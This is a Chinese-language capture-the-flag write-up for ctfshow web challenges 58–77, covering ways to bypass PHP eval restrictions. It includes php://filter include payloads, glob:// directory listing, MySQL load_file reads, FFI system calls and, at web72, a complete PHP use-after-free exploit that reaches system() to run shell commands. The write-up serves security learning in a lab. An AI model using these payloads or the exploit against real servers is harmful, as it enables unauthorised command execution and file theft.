ctfshow-web入门-命令执行2
现在开始命令执行的第二部分,范围是web58-web77。
web58(开始代码执行突破禁用函数)
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}此题看似并未做过滤,但是通过尝试可以发现将用来执行linux命令的函数基本都被加到disable_function里面了。
所以这里就可以使用前面用过的,include直接包含文件
c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php然后拿base64解码,获得flag
此题还有一中非常闷骚的解法。因为可以看到这个代码里面自带一个木马,只不过添加了很多禁用函数。我们可以在蚁剑里尝试直接连接,密码是c。如果不行,就下载一个蚁剑插件绕过disable的限制。
然后发现可以成功连接,翻阅目录获得flag
此题看到别人的wp还有这种解法
print_r(scandir(current(localeconv()))); 相当于ls,查看当前目录有什么文件
?c=show_source('flag.php');
?c=highlight_file("flag.php");web59
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
}与上一题一样,尝试include
c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
解码获得flag
web60
<?php
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}else{
highlight_file(__FILE__);
可以看到highlight_file肯定不会被禁用
所以直接读
c=highlight_file("flag.php");
web61
与上一题一样
web62
与上一题一样
web63
与上一题一样
web64
与上一题一样
web65
与上一题一样
web66
这一次还是用上一关的方式
发现说不在这个文件里面
那我们尝试枚举一下根目录下的文件
c=print_r(scandir("/"));
发现有一个flag.txt
然后可以直接highlight_file读取
c=highlight_file("flag.php");web67
我们开始还是先使用上面的方法看一下根目录下有什么
c=print_r(scandir("/"));可以发现报错
这说明print_r被禁用了
那还有什么方式可以打印目录呢?
var_dump()也可以打印
c=var_dump(scandir("/"));
可以发现flag.txt文件,然后还是尝试使用highlight_file读取
c=highlight_file("/flag.txt");成功拿到flag
web68
打开题目就看到禁用了highlight_file,真是很难崩
那就不管他,代码应该跟上一关的一样
c=var_dump(scandir('/'));
发现还是有flag.txt,但是highlight_file被禁用了,必须换别的方式才能读取文件
尝试使用readfile读取发现也被禁用了
还可以尝试使用include或者是require来读取文件
c=include(‘/flag.txt’);
web69
这一次可以发现var_dump也被ban了
还可以通过下面这种方式进行目录扫描
c=var_export(scandir('/'));
发现flag.txt,然后尝试读取文件
c=include('/flag.txt');成功获得flag
web70
打开发现莫名其妙
不管他还是先跟前面一样做法
c=var_export(scandir('/'));
然后读取文件
c=include('/flag.txt');成功获得flag
web71
附件有一个源代码可以下载
下载后代码如下
<?php
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
$s = ob_get_contents();
ob_end_clean();
echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
highlight_file(__FILE__);
}
?>
你要上天吗?代码审计后有以下这些关键点
// 获取代码执行的输出内容
$s = ob_get_contents();
ob_end_clean();
// 对输出内容进行混淆:将所有字母和数字替换为?
echo preg_replace("/[0-9]|[a-z]/i","?",$s);这一关会将代码执行结果中的数字与字母全部转换成?
有点束手无策了,查看别的师傅写的wp才知道
可以直接通过exit(0);将后面的代码截断,这样便不会执行替换的步骤
payload如下
c=var_export(scandir('/'));exit(0);
c=include('/flag.txt');exit(0);web72(UAF绕过open_basedir)
<?php
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
$s = ob_get_contents();
ob_end_clean();
echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
highlight_file(__FILE__);
}
?>代码看起来跟上一关没有区别啊
尝试上一关的payload
c=var_export(scandir('/'));exit(0);
但是尝试读取当前目录发现是可以读取的
这说明是对目录的翻阅做了限制,查阅资料才知道
尝试使用 scandir() 函数来扫描根目录,但由于 open_basedir 限制,这个操作被禁止了。
open_basedir 是 PHP 的一个安全配置指令,用来限制 PHP 脚本只能访问特定的目录。
当前配置只允许访问 /var/www/html/ 目录及其子目录,但不允许访问其他目录。可以使用使用 glob:// 伪协议绕过 open_basedir,读取根目录下的文件
payload如下
c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{
echo($f->__toString().' ');
}
exit(0);代码解释如下
$a = new DirectoryIterator("glob:///*"); // 创建一个DirectoryIterator对象,遍历根目录
foreach ($a as $f) { // 遍历每个条目
echo($f->__toString() . ' '); // 输出条目的名称,并添加一个空格
}
exit(0); // 终止脚本执行执行结果如下
可以发现flag在flag0.txt中
但是读取又是个问题,看了别人的wp发现都是使用的一个大佬写的包含pwn知识的脚本。我是看不懂pwn的内容了,当个脚本小子好了。
原理:利用uaf的脚本进行命令利用uaf的脚本进行命令执行执行
c=?><?php
pwn("ls /;cat /flag0.txt");
function pwn($cmd) {
global $abc, $helper, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace(); # ;)
if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
$backtrace = debug_backtrace();
}
}
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= sprintf('%c',$ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = sprintf('%c',$v & 0xff);
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
# handle pie
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'constant' constant check
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'bin2hex' constant check
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if($leak == 0x10102464c457f) { # ELF header
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if($f_name == 0x6d6574737973) { # system
return leak($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
function trigger_uaf($arg) {
# str_shuffle prevents opcache string interning
$arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
$vuln = new Vuln();
$vuln->a = $arg;
}
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$n_alloc = 10; # increase this value if UAF fails
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
trigger_uaf('x');
$abc = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) { };
if(strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
# leaks
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
# fake value
write($abc, 0x60, 2);
write($abc, 0x70, 6);
# fake reference
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
# fake closure object
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
# pwn
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4); # internal func type
write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
($helper->b)($cmd);
exit();
}执行结果如下
成功获得flag
web73
先尝试上一关的目录扫描方法
c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{
echo($f->__toString().' ');
}
exit(0);发现flag在flagc.txt里
然后尝试正常读文件
c=include('/flagc.txt');发现成功获得flag
web74
先使用一般的目录扫描方式
c=var_export(scandir('/'));
返回NULL然后再使用glob的方式
c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{
echo($f->__toString().' ');
}
exit(0);
返回
bin dev etc flagx.txt home lib media mnt opt proc root run sbin srv sys tmp usr var可以看到flag在flagx.txt中
尝试直接读取
c=include('/flagx.txt');exit(0);成功获得flag
后面看别人的wp发现这样也可以读
c=var_export(glob('/*'));exit();web75(利用mysql的load_file读文件)
尝试目录扫描
c=var_export(glob('/*'));exit();发现返回的是false
那尝试使用glob协议
c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{
echo($f->__toString().' ');
}
exit(0);得知flag在flag36.txt中
但是尝试正常读,以及前面的uaf读发现都不行。又无能为力了看了下别人的wp。
发现原因是因为include限制文件夹,而之前的uaf poc因为strlen被禁了获取不到system地址也没法用了,但是既然php受限制,那么mysql的load_file函数呢?
那么便有了下面的payload
c=$conn = mysqli_connect("127.0.0.1", "root", "root", "information_schema"); $sql = "select load_file('/flag36.txt') as a"; $row = mysqli_query($conn, $sql); while($result=mysqli_fetch_array($row)){ echo $result['a']; } exit();由于知道了文件的具体路径,所以不需要知道数据库名是什么,直接填information_schema就行
然后通过load_file读取文件再输出。
最后成功获得flag
后面看别的大佬的Wp,发现在php中连接mysql还可以这样
PDO(PHP Data Objects)是PHP中的一个扩展,它提供了一个统一的接口来访问不同的数据库。它支持预处理语句和事务,使数据库操作更安全和高效。
DSN(数据源名称,Data Source Name)是一个包含数据库连接信息的字符串。它通常包括数据库类型、主机名、数据库名称等信息。在创建PDO对象时指定,即 'mysql:host=localhost;dbname=information_schema'。这个字符串包含了数据库类型(mysql)、主机名(localhost)和数据库名称(information_schema)。
foreach 是PHP中的一个控制结构,用于遍历数组或对象。
所以还可以这样
c=try {
$dbh = new PDO('mysql:host=localhost;dbname=information_schema', 'root', 'root');
foreach($dbh->query('select load_file("/flag36.txt")') as $row) {
echo($row[0])."|";
}
$dbh = null;
} catch (PDOException $e) {
echo $e->getMessage();
die();
};exit();
还可以跟sql注入一样查数据库名、表名、列名
c=$dsn = "mysql:host=localhost;dbname=information_schema";
$db = new PDO($dsn, 'root', 'root');
$rs = $db->query("select group_concat(SCHEMA_NAME) from SCHEMATA");
foreach($rs as $row){
echo($row[0])."|";
}exit();
web76
使用glob协议获得flag位置
c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{
echo($f->__toString().' ');
}
exit(0);得到flag在flag36d.txt
然后使用load_file读取
c=$conn = mysqli_connect("127.0.0.1", "root", "root", "information_schema"); $sql = "select load_file('/flag36d.txt') as a"; $row = mysqli_query($conn, $sql); while($result=mysqli_fetch_array($row)){ echo $result['a']; } exit();成功获得flag
web77
使用glob协议获得flag的位置
c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{
echo($f->__toString().' ');
}
exit(0);发现flag在flag36x.txt中
并且注意到有一个readflag文件,猜测应该是一个可执行文件用来读取flag36x.txt。
我们先尝试一下前面的读取方式,发现都行不通。
那应该就是要利用这个可执行文件了。查阅资料和看了别人的wp才知道。
php7.4以上有一个FFI功能,可以用来调用 C 语言的 system 函数,并执行一个 Shell 命令。
https://www.php.net/manual/zh/ffi.cdef.php
payload如下
c=$ffi = FFI::cdef("int system(const char *command);");$a='/readflag > 1.txt';$ffi->system($a);代码解释如下
$ffi = FFI::cdef("int system(const char *command);");//创建一个system对象
$a='/readflag > 1.txt';//readflag是没有回显的所以需要将输出重定向到1.txt
$ffi->system($a);//通过$ffi去调用system函数
FFI::cdef 方法用于定义 C 函数原型,其中 int system(const char *command); 是 C 语言中 system 函数的声明。system 函数接受一个字符串参数(即Shell命令),并在系统的命令行中执行该命令;
之后执行 /readflag 程序并将其输出重定向到文件 1.txt;
通过 FFI 对象 $ffi 调用了前面定义的 system 函数,并传递了字符串变量 $a 作为参数。也就是说,实际执行的是 Shell 命令 /readflag > 1.txt,效果是在系统中运行 /readflag 程序,并将其输出结果保存到当前目录下的 1.txt 文件中。使用了payload之后直接访问1.txt便能看到flag
至于为什么不可以直接读flag36x.txt文件
c=$ffi = FFI::cdef("int system(const char *command);");$a='cat /flag36x.txt> 2.txt';$ffi->system($a);这是因为目前用户是www-test用户,而flag36x.txt的权限是r--r-----。所以对于www-test用户而言是无法读取flag36x.txt的。